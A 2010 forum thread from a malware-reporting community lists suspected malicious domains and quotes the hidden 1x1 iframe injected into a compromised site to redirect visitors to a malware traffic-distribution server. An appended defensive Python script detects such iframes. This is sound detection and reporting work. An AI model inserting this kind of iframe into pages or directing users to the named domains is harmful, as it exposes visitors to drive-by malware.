Author Topic: Domains Not In Malware Domain List  (Read 4361 times)

August 06, 2010, 03:05:26 am

izzy.rose

  • Newbie

hxxp://www.hdtvxvid.net/ - Fake Codec
hxxp://www.madsexxx.com/ - Malware/Porn Site
hxxp://www.playcontact.com/ - Fake Codec
hxxp://www.ezthemes.com/ - Malware Distributor
hxxp://www.information.com/ - Fake Search Engine (Opens Up Fake Links To Malware Sites)
hxxp://www.aaathemes.com/ - Malware Distributor
hxxp://www.imgfarm.com/ - Adware/Spyware Distributor
...And that's about it.  ::)
-Izzy
------------------
→Izzy Loves GN'R←

August 17, 2010, 01:58:39 pm
Reply #1

Mofaya

  • Newbie


Can someone please check this one out too, please?? It's been up for a few months now that I know of, because it's the second time I bumped into it.  >:(

The domain is jamaican-slang.com

Thank you very much, all admins, I love the site very much  ;).

August 17, 2010, 02:18:12 pm
Reply #2

SysAdMini

  • Administrator
  • Hero Member

If you can provide complete URLs which point to malicious content, then we will check them.

We never simply add domain names and claim that there is "something". It has to be clear and provable what's wrong with a site.
Investigating sites is very time consuming. It saves us a lot of time if you provide as many details as you can, for example
VirusTotal, Wepawet or JsUnpack reports.
Ruining the bad guy's day

August 17, 2010, 03:03:31 pm
Reply #3

Mofaya

  • Newbie

Yes, sorry about that.

OK, I'm a total noob at this, but from the looks of it the site has been compromised.
Here is the Wepawet analysis report:
http://wepawet.iseclab.org/view.php?hash=1799f721a44f89ce84d6e5485287a27f&t=1282053697&type=js

The first thing that caught my eye was
<iframe src='hxxp://itsallbreaksoft.net/tds/in.cgi?3&seoref=http%3A%2F%2Fwww.jamaican-slang.com%2F&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.jamaican-slang.com%2F&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>

After googling itsallbreaksoft.net I bumped into this:
http://www.theinternetpatrol.com/was-your-site-hacked-redirecting-to-itsallbreaksoftnet-or-paymoneysysteminfo-heres-what-happened/

itsallbreaksoft.net is currently down.
I think this is the reason why my antivirus blocked the site for being infected with an iframe trojan.

PS: Sorry for my bad English.

August 17, 2010, 07:25:18 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

Thanks. Any additional information about a URL helps a lot.

hxxp://www.jamaican-slang.com/ contains an obfuscated script which directs to hxxp://itsallbreaksoft.net/tds/in.cgi?3.
itsallbreaksoft.net is offline.


Ruining the bad guy's day
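
Added example (not part of the original thread): a small Python check that produces the kind of evidence asked for above, listing off-site iframes that are 1x1 or CSS-hidden, as in the snippet from Reply #3. The sample page and the example.* hosts are constructed; since Reply #4 notes the iframe is written by an obfuscated script, the check is assumed to run on deobfuscated or rendered HTML.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

def _px(value):
    """Return a width/height attribute as int, or None if absent or relative (e.g. 100%)."""
    try:
        return int((value or "").strip().lower().removesuffix("px"))
    except ValueError:
        return None

def defang(url):
    """Report URLs in the hxxp form used in this thread so they are not clickable."""
    return url.replace("http", "hxxp", 1)

class HiddenIframeFinder(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlsplit(page_url).hostname
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = urlsplit(src).hostname          # None for relative (same-site) URLs
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = (a.get("style") or "").replace(" ", "").lower()
        tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
        hidden = "display:none" in style or "visibility:hidden" in style
        if host and host != self.page_host and (tiny or hidden):
            self.findings.append(
                {"host": host, "url": defang(src), "line": self.getpos()[0]})

def scan(html, page_url):
    finder = HiddenIframeFinder(page_url)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: two legitimate frames, two invisible off-site frames.
SAMPLE = """<html><body>
<iframe src="/local/banner.html" width="300" height="250"></iframe>
<iframe src="https://video.example.org/embed/1" width="560" height="315"></iframe>
<iframe src='http://tds.example.net/in.cgi?3' width=1 height=1 border=0 frameborder=0></iframe>
<iframe src="http://ads.example.net/x" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in scan(SAMPLE, "http://www.example.com/"):
        print(f"line {f['line']}: hidden iframe to {f['host']} -> {f['url']}")
```

A hit is only a lead: the reported URL still has to be checked (for example with the report services named in Reply #2) before it counts as provable malicious content.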